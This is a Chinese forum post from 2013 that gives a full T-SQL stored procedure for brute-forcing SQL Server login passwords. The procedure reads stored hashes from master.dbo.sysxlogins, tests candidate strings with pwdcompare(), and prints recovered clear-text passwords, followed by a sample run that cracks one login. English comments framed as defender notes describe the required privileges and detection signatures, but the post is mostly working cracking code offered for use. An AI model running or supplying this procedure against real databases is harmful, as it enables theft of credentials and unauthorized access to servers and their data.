
破解MSSQL的SA密码

发表于 2013-2-27 21:32:55 | 显示全部楼层 |阅读模式
-- Brute-force recovery of SQL Server login passwords: copies each login's
-- stored hash from master.dbo.sysxlogins into #pwd, then, pass by pass,
-- cross-joins one more copy of the alphabet table #t and keeps the first
-- candidate string that pwdcompare() accepts for that hash.
--
-- Defender notes:
--   * sysxlogins / xstatus / srvid are SQL Server 2000-era catalog objects
--     (later versions expose logins through sys.sql_logins instead), and
--     reading master.dbo.sysxlogins normally requires sysadmin-level rights,
--     so this procedure only runs for a caller that already holds high
--     privilege on the instance.
--   * Every pass is one long-running UPDATE whose statement text contains
--     'pwdcompare' and joins tempdb tables to rows copied from
--     master.dbo.sysxlogins, and whose scanned row count (@t below) grows
--     by a factor of len(@ss) per pass. That text and that growth pattern
--     are the signatures to alert on in traces / query-text audits.
--   * The alphabet below has no uppercase letters (see the commented-out
--     line), so long, mixed-case login passwords are outside its reach;
--     keeping sysadmin membership minimal and preferring Windows
--     authentication removes the precondition altogether.
alter
proc p_GetPassword2
    @username sysname=null, --login name; when null, every login is processed

@pwdlen
int=2
--number of password characters to try; the default covers passwords of 2 characters or fewer
as
    set nocount on

    -- Drop leftovers from an earlier run so the CREATE / SELECT INTO below succeed.
    if
object_id(N'tempdb..#t') is
not
null
        drop
table #t
    if
object_id(N'tempdb..#pwd') is
not
null
        drop
table #pwd

    -- Convert the requested length into the number of extra passes after the
    -- single-character pass: null or < 1 becomes 1 extra pass, otherwise @pwdlen-1.
    set
@pwdlen=case
when
isnull(@pwdlen,0)<1
then
1
else
@pwdlen-1
end

    -- Candidate alphabet: lowercase letters, digits and punctuation only.
    declare
@ss
varchar(256)
    --select @ss= '123456789'

select
@ss=
'abcdefghijklmnopqrstuvwxyz'
    select
@ss=@ss+
'`0123456789-=[]\;,./'
    select
@ss=@ss+
'~!@#$%^&*()_+{}|:<>?'
    --select @ss=@ss+    'ABCDEFGHIJKLMNOPQRSTUVWXYZ'

    -- #t holds one row per alphabet character (the clustered PK rejects
    -- duplicates); each pass cross-joins one more copy of it (aliases aa, ab, ...).
    create
table #t(c char(1) not
null)
    alter
table #t add
constraint PK_#t primary
key
CLUSTERED (c)
    declare
@index
int
    select
@index=1
    while (@index
<=len(@ss))
    begin
        insert #t select
SUBSTRING(@ss, @index, 1)
        select
@index
=
@index
+1
    end

    -- Working copy of the login rows:
    --   type   = bit 2048 of xstatus, passed straight through as pwdcompare's
    --            third argument (hash-format selector; NOTE(review): confirm its
    --            meaning against the SQL Server 2000 catalog before relying on it)
    --   jm     = 1 once a row needs no further work (NULL hash now, or matched later)
    --   pwdstr = recovered clear text; pwd = its ASCII codes; times = per-pass log
    -- srvid IS NULL presumably keeps local logins only (linked-server mappings
    -- carry a server id) -- verify against the catalog definition.
    select name,password
        ,type=case
when xstatus&2048=2048
then
1
else
0
end
        ,jm=case
when password is
null
then
1
else
0
end
        ,pwdstr=cast(''
as sysname)
        ,pwd=cast(''
as
varchar(8000))
        ,times =cast(''
as
varchar(8000))
        into #pwd
    from master.dbo.sysxlogins a
    where srvid is
null
        and name=isnull(@username,name)
    -- Fragments of the dynamic UPDATE built below:
    --   @s1 concatenates the per-alias characters into the candidate string,
    --   @s2 builds its comma-separated ASCII codes, @s3 lists the #t aliases
    --   joined in; @stimes accumulates "<pass>th,<rows>rows" for the times column.
    declare
@s1
varchar(8000),@s2
varchar(8000),@s3
varchar(8000), @stimes
varchar(8000)

    -- @l = number of extra aliases added so far; @t = rows the next pass will
    -- scan (logins x len(@ss)^(aliases)), recorded for the caller.
    declare
@l
int, @t
bigint

    select
@t
=
count(1)*POWER(len(@ss),1) from #pwd

    select
@l=0
        ,@s1='aa.c'
        ,@s2='cast(ASCII(aa.c) as varchar)'
        ,@s3=',#t aa'
        ,@stimes='1th,'
+
cast(@t
as
varchar(20)) +
'rows'

    -- Pass 1: single-character candidates. Note this first pass does not
    -- write the times column; only the passes inside the loop do.
    exec('
        update pwd set jm=1,pwdstr='+@s1+'
        ,pwd='+@s2+'
        from #pwd pwd'+@s3+'
        where pwd.jm=0
        and pwdcompare('+@s1+',pwd.password,pwd.type)=1
        ')
    -- Keep going while some login is still unmatched and the pass limit
    -- (@pwdlen, already converted to "extra passes") has not been reached.
    while
exists(select
1
from #pwd where jm=0
and
@l<@pwdlen)
    begin
        select
@l=@l+1
        -- Rows the coming pass scans; grows by a factor of len(@ss) per pass,
        -- which is why each pass appears as a progressively longer-running
        -- UPDATE in the server's activity view. Printed to the messages stream.
        select
@t
=
count(1)*POWER(len(@ss),@l+1) from #pwd
        print
@t

        -- Next two-letter alias: char(@l/26+97)+char(@l%26+97) yields ab, ac, ...
        -- and each fragment is extended by one more aliased column / join.
        select
        @s1=@s1+'+'+char(@l/26+97)+char(@l%26+97)+'.c'
        ,@s2=@s2+'+'',''+cast(ASCII('+char(@l/26+97)+char(@l%26+97)+'.c) as varchar)'
        ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
        ,@stimes=@stimes+';'+
cast(@l+1
as
varchar(1)) +
'th,'
+
cast(@t
as
varchar(20)) +
'rows'

        exec('
        update pwd set jm=1,pwdstr='+@s1+'
        ,pwd='+@s2+'
        ,times='''+@stimes+'''
        from #pwd pwd'+@s3+'
        where pwd.jm=0
        and pwdcompare('+@s1+',pwd.password,pwd.type)=1
        ')
    end
    -- Result columns (aliases are Chinese): login name, recovered password,
    -- its ASCII codes, and the per-pass "Nth,<rows>rows" log.
    select 用户名=name,密码=pwdstr,密码ASCII=pwd, 查询次数和行数=times
    from #pwd

    -- Clean up the temp tables; mirrors the guard at the top.
    if
object_id(N'tempdb..#t') is
not
null
        drop
table #t
    if
object_id(N'tempdb..#pwd') is
not
null
        drop
table #pwd
我测试如下
p_GetPassword2 'b', 6
用户名        密码        密码ASCII        查询次数和行数
b        123        49,50,51        1th,66rows;2th,4356rows;3th,287496rows